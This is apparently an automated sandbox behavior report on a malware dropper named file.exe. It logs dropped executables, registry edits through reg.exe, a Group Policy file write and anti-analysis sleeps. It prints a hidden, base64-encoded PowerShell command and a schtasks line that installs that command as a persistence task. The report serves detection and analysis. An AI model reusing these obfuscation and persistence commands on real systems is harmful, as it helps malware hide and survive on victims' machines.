Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2072:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic file information: File size 7604002 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx0_2_00411361
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413954 push eax; ret 0_2_00413972
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413CC0 push eax; ret 0_2_00413CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02E4EB56 push es; iretd 38_2_02E4EB57
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.0.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep count: 2307 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6140Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2307Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
